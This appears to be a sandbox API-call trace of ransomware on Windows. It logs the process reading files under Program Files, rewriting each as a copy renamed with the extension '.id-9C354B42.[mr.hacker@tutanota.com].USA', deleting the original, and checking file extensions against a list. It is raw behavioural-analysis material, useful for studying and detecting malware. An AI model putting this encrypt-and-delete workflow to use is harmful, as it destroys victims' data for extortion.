0 [0265.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.697] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0265.697] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0265.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0265.907] GetLastError () returned 0x0 [0265.907] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0xa2b58, lpOverlapped=0x0) returned 1 [0266.106] WriteFile (in: hFile=0x328, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xa2b60, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xa2b60, lpOverlapped=0x0) returned 1 [0266.117] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0266.117] WriteFile (in: hFile=0x328, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0266.117] SetEndOfFile (hFile=0x328) returned 1 [0266.117] CloseHandle (hObject=0x328) returned 1 [0266.117] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0266.117] SetEndOfFile (hFile=0x348) returned 1 [0266.140] CloseHandle (hObject=0x348) returned 1 [0266.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0266.546] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll")) returned 1 [0266.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.547] lstrlenW (lpString=".doc") returned 4 [0266.547] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0266.547] lstrlenW (lpString=".docx") returned 5 [0266.547] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1 [0266.547] lstrlenW (lpString=".pdf") returned 4 [0266.547] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0266.547] lstrlenW (lpString=".xls") returned 4 [0266.547] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0266.547] lstrlenW (lpString=".xlsx") returned 5 [0266.547] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1 [0266.547] lstrlenW (lpString=".ppt") returned 4 [0266.547] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0266.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.547] lstrlenW (lpString=".zip") returned 4 [0266.547] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0266.547] lstrlenW (lpString=".rar") returned 4 [0266.547] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0266.547] lstrlenW (lpString=".bz2") returned 4 [0266.547] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0266.547] lstrlenW (lpString=".7z") returned 3 [0266.547] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0266.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.548] lstrlenW (lpString=".dbf") returned 4 [0266.548] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0266.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.548] lstrlenW (lpString=".1cd") returned 4 [0266.548] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0266.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.548] lstrlenW (lpString=".jpg") returned 4 [0266.548] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0266.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.548] lstrlenW (lpString=".doc") returned 4 [0266.548] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0266.548] lstrlenW (lpString=".docx") returned 5 [0266.548] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1 [0266.548] lstrlenW (lpString=".pdf") returned 4 [0266.548] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0266.548] lstrlenW (lpString=".xls") returned 4 [0266.548] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0266.548] lstrlenW (lpString=".xlsx") returned 5 [0266.548] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1 [0266.548] lstrlenW (lpString=".ppt") returned 4 [0266.548] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0266.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.548] lstrlenW (lpString=".zip") returned 4 [0266.548] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0266.548] lstrlenW (lpString=".rar") returned 4 [0266.549] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0266.549] lstrlenW (lpString=".bz2") returned 4 [0266.549] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0266.549] lstrlenW (lpString=".7z") returned 3 [0266.549] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0266.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.549] lstrlenW (lpString=".dbf") returned 4 [0266.549] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0266.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.549] lstrlenW (lpString=".1cd") returned 4 [0266.549] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0266.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0266.549] lstrlenW (lpString=".jpg") returned 4 [0266.549] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0266.549] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0266.549] lstrlenW (lpString="EAST_01.MID") returned 11 [0266.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0267.057] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=6165) returned 1 [0267.058] CloseHandle (hObject=0x2bc) returned 1 [0267.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 0x20 [0267.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0267.058] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.058] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0267.059] GetLastError () returned 0x0 [0267.059] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x1815, lpOverlapped=0x0) returned 1 [0267.060] WriteFile (in: hFile=0x348, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x1820, lpOverlapped=0x0) returned 1 [0267.061] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0267.061] WriteFile (in: hFile=0x348, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0267.061] SetEndOfFile (hFile=0x348) returned 1 [0267.061] CloseHandle (hObject=0x348) returned 1 [0267.061] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.061] SetEndOfFile (hFile=0x2bc) returned 1 [0267.063] CloseHandle (hObject=0x2bc) returned 1 [0267.063] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.064] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 1 [0267.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.064] lstrlenW (lpString=".doc") returned 4 [0267.064] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.064] lstrlenW (lpString=".docx") returned 5 [0267.064] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.064] lstrlenW (lpString=".pdf") returned 4 [0267.064] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.064] lstrlenW (lpString=".xls") returned 4 [0267.064] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.064] lstrlenW (lpString=".xlsx") returned 5 [0267.064] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.064] lstrlenW (lpString=".ppt") returned 4 [0267.064] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.064] lstrlenW (lpString=".zip") returned 4 [0267.064] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.064] lstrlenW (lpString=".rar") returned 4 [0267.064] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.064] lstrlenW (lpString=".bz2") returned 4 [0267.064] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.064] lstrlenW (lpString=".7z") returned 3 [0267.065] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.065] lstrlenW (lpString=".dbf") returned 4 [0267.065] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.065] lstrlenW (lpString=".1cd") returned 4 [0267.065] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.065] lstrlenW (lpString=".jpg") returned 4 [0267.065] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.065] lstrlenW (lpString=".doc") returned 4 [0267.065] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.065] lstrlenW (lpString=".docx") returned 5 [0267.065] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.065] lstrlenW (lpString=".pdf") returned 4 [0267.065] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.065] lstrlenW (lpString=".xls") returned 4 [0267.065] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.065] lstrlenW (lpString=".xlsx") returned 5 [0267.065] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.065] lstrlenW (lpString=".ppt") returned 4 [0267.065] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.066] lstrlenW (lpString=".zip") returned 4 [0267.066] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.066] lstrlenW (lpString=".rar") returned 4 [0267.066] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.066] lstrlenW (lpString=".bz2") returned 4 [0267.066] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.066] lstrlenW (lpString=".7z") returned 3 [0267.066] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.066] lstrlenW (lpString=".dbf") returned 4 [0267.066] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.066] lstrlenW (lpString=".1cd") returned 4 [0267.066] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0267.066] lstrlenW (lpString=".jpg") returned 4 [0267.066] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.066] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0267.066] lstrlenW (lpString="EXPLR_01.MID") returned 12 [0267.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0267.067] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=10562) returned 1 [0267.067] CloseHandle (hObject=0x2bc) returned 1 [0267.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 0x20 [0267.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0267.067] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.067] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0267.068] GetLastError () returned 0x0 [0267.068] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x2942, lpOverlapped=0x0) returned 1 [0267.069] WriteFile (in: hFile=0x348, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x2950, lpOverlapped=0x0) returned 1 [0267.070] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0267.070] WriteFile (in: hFile=0x348, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.070] SetEndOfFile (hFile=0x348) returned 1 [0267.070] CloseHandle (hObject=0x348) returned 1 [0267.070] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.070] SetEndOfFile (hFile=0x2bc) returned 1 [0267.469] CloseHandle (hObject=0x2bc) returned 1 [0267.469] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.486] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 1 [0267.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.487] lstrlenW (lpString=".doc") returned 4 [0267.487] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.487] lstrlenW (lpString=".docx") returned 5 [0267.487] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.487] lstrlenW (lpString=".pdf") returned 4 [0267.487] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.487] lstrlenW (lpString=".xls") returned 4 [0267.487] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.487] lstrlenW (lpString=".xlsx") returned 5 [0267.487] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.487] lstrlenW (lpString=".ppt") returned 4 [0267.487] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.487] lstrlenW (lpString=".zip") returned 4 [0267.487] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.487] lstrlenW (lpString=".rar") returned 4 [0267.487] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.487] lstrlenW (lpString=".bz2") returned 4 [0267.487] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.488] lstrlenW (lpString=".7z") returned 3 [0267.488] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.488] lstrlenW (lpString=".dbf") returned 4 [0267.488] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.488] lstrlenW (lpString=".1cd") returned 4 [0267.488] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.488] lstrlenW (lpString=".jpg") returned 4 [0267.488] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.488] lstrlenW (lpString=".doc") returned 4 [0267.488] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.488] lstrlenW (lpString=".docx") returned 5 [0267.488] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.488] lstrlenW (lpString=".pdf") returned 4 [0267.488] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.488] lstrlenW (lpString=".xls") returned 4 [0267.488] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.549] lstrlenW (lpString=".xlsx") returned 5 [0267.549] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.549] lstrlenW (lpString=".ppt") returned 4 [0267.549] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.549] lstrlenW (lpString=".zip") returned 4 [0267.549] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.549] lstrlenW (lpString=".rar") returned 4 [0267.549] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.549] lstrlenW (lpString=".bz2") returned 4 [0267.549] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.549] lstrlenW (lpString=".7z") returned 3 [0267.550] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.550] lstrlenW (lpString=".dbf") returned 4 [0267.550] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.550] lstrlenW (lpString=".1cd") returned 4 [0267.550] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0267.550] lstrlenW (lpString=".jpg") returned 4 [0267.550] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.550] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0267.550] lstrlenW (lpString="GRID_01.MID") returned 11 [0267.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.012] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=6331) returned 1 [0268.012] CloseHandle (hObject=0x384) returned 1 [0268.013] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid")) returned 0x20 [0268.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff 